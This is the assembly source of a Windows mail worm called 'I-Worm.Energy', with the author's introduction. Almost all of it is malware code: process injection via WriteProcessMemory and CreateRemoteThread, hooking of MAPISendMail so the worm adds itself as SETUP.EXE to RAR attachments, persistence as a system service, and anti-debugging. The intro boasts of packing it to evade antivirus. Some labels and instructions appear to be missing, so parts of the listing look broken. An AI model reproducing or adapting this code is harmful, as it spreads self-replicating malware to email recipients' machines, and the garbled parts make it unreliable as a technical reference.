![]() |
<EFBFBD> I-Worm.Energy <EFBFBD>
<EFBFBD> by Benny/29A <EFBFBD>
hey all...
it was one b0ring sunday, when I decided to code some small and kewl virus...
I was tired from coding large projectz (HIV, XTC)... I wanted to code one
worm with some nice ideaz, like the Win2k.Stream.
and here it is. after some meditationz, full of experiencez from psychedelics
I decided to call this worm "Energy"... it is very small worm, spreading via
RAR filez. it can parse all processes, hook there MAPISendMail API procedure
and infect all attached RAR filez in a message by dropping itself to there.
very similar technique of the process'es address space manipulationz is
described in my article "Multi-process residency" and Win32.HIV virus. surely
it can't work on Win95/98 systemz. it worx on Windows 2000 OS, and (perhaps)
also on earlier versionz of Windows NT - but I don't know, I haven't tested it.
it can stay resident in memory as a service, by standard API callz, valid only
in NT systemz. while infecting the RAR archivez it addz itself to there under
the "SETUP.EXE" filename, containing also the standard setup icon. I tried to
optimize the source a bit... I know the worm is not super-small, but I it is
resident heavilly armoured very effective tiny mail-spreading worm.
the scheme of execution:
after execution:
- anti-* stuff
- if initialized by SCM, run as a service process
- copy worm to system directory as "ENERGY.EXE"
- register worm as service process and run it everytime the OS will start
- enum processes, find MAPI32.dll there and hook MAPSendMail (using many
- wait one minute and again
- parse embedded filez and search for RAR filez.
- infect them by worm file: SETUP.EXE, mark as read-only (already-infected
the worm is encrypted/compressed by "tElock, version 0.51", one very nice
utility for armouring executable filez. this protector containz many nice
anti-* featurez. that's why I decided to use it. and also becoz I think guyz at
AVP can't handle this one.
it is possible that worm containz some bugz. yeah, but I don't care... I'm glad
I was able to finish it in 2 dayz and that it was not b0ring. I had a fun.
If you would like to consult anything with me, feel free to contact me...
@ benny_29a@privacyx.com <EFBFBD>
@ http://benny29a.cjb.net <EFBFBD>
.model flat ;blablabla
extrn GetLastError:PROC ;needed APIz
extrn EnumProcesses:PROC
extrn OpenProcess:PROC
extrn VirtualProtect:PROC
extrn VirtualAllocEx:PROC
extrn VirtualFreeEx:PROC
extrn CloseHandle:PROC
extrn CreateRemoteThread:PROC
extrn WriteProcessMemory:PROC
extrn Sleep:PROC
extrn WaitForSingleObject:PROC
extrn GetModuleHandleA:PROC
extrn GetProcAddress:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn GetModuleFileNameA:PROC
extrn GetFileSize:PROC
extrn ReadFile:PROC
extrn VirtualFree:PROC
extrn VirtualAlloc:PROC
extrn SetFilePointer:PROC
extrn SetFileAttributesA:PROC
extrn OpenMutexA:PROC
extrn ExitThread:PROC
extrn GetSystemDirectoryA:PROC
extrn CopyFileA:PROC
;extrn OpenServiceA:PROC
;extrn DeleteService:PROC ;***debug only!
extrn OpenSCManagerA:PROC
extrn CreateServiceA:PROC
extrn CloseServiceHandle:PROC
extrn StartServiceCtrlDispatcherA:PROC
extrn RegisterServiceCtrlHandlerA:PROC
extrn SetServiceStatus:PROC
include useful.inc ;include filez
include win32api.inc
PROC_COUNT equ 40*4 ;number of processes
db ? ;some data
Start: ;worm code starts here
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
e_name: @pushsz 'EnErGy'
push 0
push 1
call OpenMutexA ;check if mutex is
test eax,eax ;created, if not,
je end_seh ;we are prob. debugged
push eax
call CloseHandle ;close its handle
jmp SVCRegister ;logging as a service
e_svc: push 256
mov esi, offset worm_name
push esi
push 0
call GetModuleFileNameA ;get path+filename of
;the worm
mov edi,offset sys_dir
push edi
push 256
push edi
call GetSystemDirectoryA ;get windowz system dir.
add edi,eax
mov al,'\'
mov eax,'rene'
mov eax,'e.yg'
mov eax,'ex'
stosd ;construct path+filename
pop edi
push 0
push edi
push esi
call CopyFileA ;copy worm to sys. dir.
call SVCCreate ;register as a service
push api_num
pop ecx
call @api_table
dd offset GetModuleHandleA ;adressez of APIz
dd offset GetProcAddress
dd offset VirtualProtect
dd offset CreateFileA
dd offset CloseHandle
dd offset WriteFile
dd offset GetFileSize
dd offset ReadFile
dd offset VirtualFree
dd offset VirtualAlloc
dd offset SetFilePointer
dd offset SetFileAttributesA
api_num = 12
pop ebx
call @api_dest ;addressez of variablez
dd offset _gmha ;that will hold APIz
dd offset _gpa
dd offset _vp
dd offset _cfa
dd offset _ch
dd offset _wf
dd offset _gfs
dd offset _rf
dd offset _vf
dd offset _va
dd offset _sfp
dd offset _sfaa
pop esi
dec ecx ;decrement counter
mov eax,[ebx+ecx*4]
mov eax,[eax+2]
mov eax,[eax]
mov edx,[esi+ecx*4]
mov [edx],eax ;store API address
test ecx,ecx
jne get_apiz
mov ebx,offset tmp
push ebx
mov esi,offset proc_dump
push esi
call EnumProcesses ;enum all processez
dec eax
jne end_seh
mov ecx,[ebx] ;try this PID
call proc_infect ;try to infect it
add ecx,-3
loop p_check ;try next PID
push 60000
call Sleep ;wait one minute
jmp worm_loop ;and try again.
;infect processez
proc_infect Proc
push eax
push 0
push 2 or 8 or 10h or 20h or 400h
call OpenProcess ;get handle to process
xchg eax,ecx
jecxz end_proc_infect
mov ebx,ecx
push virtual_end-Start
push 0
push ebx
call VirtualAllocEx ;allocate there memory
xchg eax,ecx ;for worm
jecxz end_proc_infect2
mov esi,ecx
push 0
push virtual_end-Start
push offset Start
push esi
push ebx
call WriteProcessMemory ;copy there worm body
dec eax
jne end_proc_infect3
lea edx,[esi+offset ThreadEntry-offset Start]
push eax
push eax
push eax
push edx
push eax
push eax
push ebx
call CreateRemoteThread ;create thread there
xchg eax,ecx
jecxz end_proc_infect3
push ecx
push -1
push ecx
call WaitForSingleObject ;wait for its termination
call CloseHandle ;and close its handle
jmp end_proc_infect2 ;and quit
push 0
push esi
push ebx
call VirtualFreeEx ;release memory if failed
push ebx
call CloseHandle ;close handle to process
ret ;and quit
proc_infect EndP
;remote thread procedure
ThreadEntry Proc
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
call gdelta
gdelta: pop ebp ;get delta offset
@pushsz 'MAPI32.dll'
mov eax,12345678h
_gmha = dword ptr $-4
call eax ;get address of MAPI32.dll
xchg eax,ecx
jecxz end_seh ;quit if not loaded
@pushsz 'MAPISendMail'
push ecx
mov eax,12345678h
_gpa = dword ptr $-4
call eax ;get address of
xchg eax,ecx ;MAPISendMail API
jecxz end_seh
mov esi,ecx ;to ESI
lea eax,[ebp + tmp - gdelta]
push eax
push 5
push esi
mov eax,12345678h
_vp = dword ptr $-4
call eax ;release page protection
xchg eax,ecx
jecxz end_seh
call hook_api ;hook the API
end_seh:@SEH_RemoveFrame ;remove SEH frame
popad ;and quit
;proc for API hooking
mov [ebp + old_MAPI_addr - gdelta],esi
push esi
lea edi,[ebp + old_MAPI_api - gdelta]
movsb ;save first bytez of API
pop edi
mov ebx,edi
lea eax,[ebp + MAPI_hooker - gdelta]
sub ebx,eax
neg ebx
add ebx,-5
mov al,0E9h
xchg eax,ebx
stosd ;overwrite by JMP <worm_api>
;the API hooker
push 12345678h
old_MAPI_addr = dword ptr $-4 ;save the address of API
mov edi,[esp.cPushad] ;get ptr to message
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
push edi
mov ebx,[esp.cPushad.28]
mov ecx,[ebx+40] ;number of attachmentz
mov ebx,[ebx+44] ;ptr to file fieldz
f_parse:mov esi,[ebx+12]
lea edi,[ebp + arc_buffer - gdelta]
push edi
dec edi
cmp byte ptr [edi-1],'\'
je over_slash
mov al,'\'
mov esi,[ebx+16]
or [esi-5],20202020h ;lower case
cmp [esi-5],'rar.'
pop esi ;create path+filename
jne o_r ;quit if not RAR file
call infect_archive ;try to infect this file
o_r: sub ebx,-24
loop f_parse ;try another file in msg
pop edi
call @m_res
old_MAPI_api db 5 dup (90h)
@m_res: pop esi
movsb ;remove the API hooker
jmp end_seh ;and quit
;procedure for RAR archive infecting
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
call gd
gd: pop ebp ;get delta offset
lea eax,[ebp + worm_name - gd] ;get worm filename
push 0
push 0
push 0
push eax
call [ebp + _cfa - gd] ;open worm file
inc eax
je end_seh
dec eax
mov [ebp + hFile - gd],eax ;save handle
push 0
push eax
mov eax,12345678h
_gfs = dword ptr $-4
call eax ;get its size
push eax
push eax
push 0
mov eax,12345678h
_va = dword ptr $-4
call eax ;allocate enough memory
test eax,eax
pop edx
je end_file
xchg eax,ebx
push edx
push 0
lea eax,[ebp + tmp - gd]
push eax
push edx
push ebx
push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_rf = dword ptr $-4 ;and copy there worm
call eax
call close_file ;close handle to file
pop edi
mov esi,ebx
call CRC32 ;calculate CRC32 of
mov [ebp + RARCRC32 - gd],eax ;the worm file
push 0
push 0
push 0
push esi
mov eax,12345678h
_cfa = dword ptr $-4
call eax ;open the archive
inc eax
je end_file2
dec eax
mov [ebp + hFile - gd],eax ;save its handle
push 2
push 0
push 0
push eax
mov eax,12345678h
_sfp = dword ptr $-4
call eax ;go to EOF
lea esi,[ebp + RARHeaderCRC+2 - gd]
push end_RAR-RARHeader-2
pop edi
call CRC32 ;calculate CRC32 of
mov [ebp + RARHeaderCRC - gd],ax ;the RAR file header
popad ;and save it
push 0
lea eax,[ebp + tmp - gd]
push eax
push end_RAR-RARHeader
call end_RAR
RARHeader: ;No comment ;)
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw end_RAR-RARHeader
RARCompressed dd 2000h
RAROriginal dd 2000h
RAROS db 0
RARCRC32 dd 0
RARFileDateTime dd 12345678h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw end_RAR-RARName
RARAttrib dd 0
push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_wf = dword ptr $-4
call eax ;write RAR file header
push 0
lea eax,[ebp + tmp - gd]
push eax
push edi
push ebx
push dword ptr [ebp + hFile - gd]
call [ebp + _wf - gd] ;write the worm
push 0
push ebx
mov eax,12345678h
_vf = dword ptr $-4
call eax ;release the memory
call close_file ;close the archive
push esi
mov eax,12345678h
_sfaa = dword ptr $-4
call eax ;set READ-ONLY attribute
jmp end_seh ;and quit
push 12345678h ;handle...
hFile = dword ptr $-4
mov eax,12345678h
_ch = dword ptr $-4
call eax ;close file handle
CRC32 Proc
push ecx ;procedure for
push edx ;calculating CRC32s
push ebx ;at run-time
xor ecx,ecx
dec ecx
mov edx,ecx
xor eax,eax
xor ebx,ebx
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
CRC32 EndP
ThreadEntry EndP
;log on to SCM
SVCRegister Proc
call _dt
dd offset e_name+5
dd offset service_start
dd 0
dd 0
_dt: call StartServiceCtrlDispatcherA ;start service dispatcher
dec eax
jne e_svc ;quit if error (no service
push 0
call ExitThread ;terminate this thread
service_start: ;execution goes here...
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
push offset SVCHandler
push offset e_name+5
call RegisterServiceCtrlHandlerA ;register service control
test eax,eax ;handler
je e_svc ;quit if error
push eax
call _ss
ss_: dd 10h or 20h
dd 4
dd 0
dd 0
dd 0
dd 0
dd 0
_ss: push eax
call SetServiceStatus ;set service status
call CloseServiceHandle ;close service handle
jmp e_svc ;and quit
SVCRegister EndP
;create item at SCM
SVCCreate Proc
push 000F0000h or 2
push 0
push 0
call OpenSCManagerA ;get handle to SCM
test eax,eax
je e_scm0
xchg eax,esi
; push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h
; push offset e_name+5
; push esi
; call OpenServiceA ;*** debug!
; push eax
; push eax
; call DeleteService ;*** debug!
; call CloseServiceHandle ;*** debug!
xor eax,eax
push eax
push eax
push eax
push eax
push eax
push offset sys_dir
push eax
push 2
push 10h
push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h
push offset e_name+5
push dword ptr [esp]
push esi
call CreateServiceA ;create service item
test eax,eax ;at SCM
je e_scm1 ;quit if error
push eax
call CloseServiceHandle ;close service handlez
e_scm1: push esi
call CloseServiceHandle ;...
e_scm0: ret ;and quit
SVCCreate EndP
signature db 0,'[I-Worm.Energy] by Benny/29A',0
proc_dump db PROC_COUNT dup (?) ;buffer for PIDz
worm_name db 256 dup (?) ;buffer for filename
tmp dd ? ;temporary variable
sys_dir db 256 dup (?) ;buffer for system dir.
arc_buffer db 256 dup (?) ;buffer for archive
virtual_end: ;...end of virus.
end Start ;.
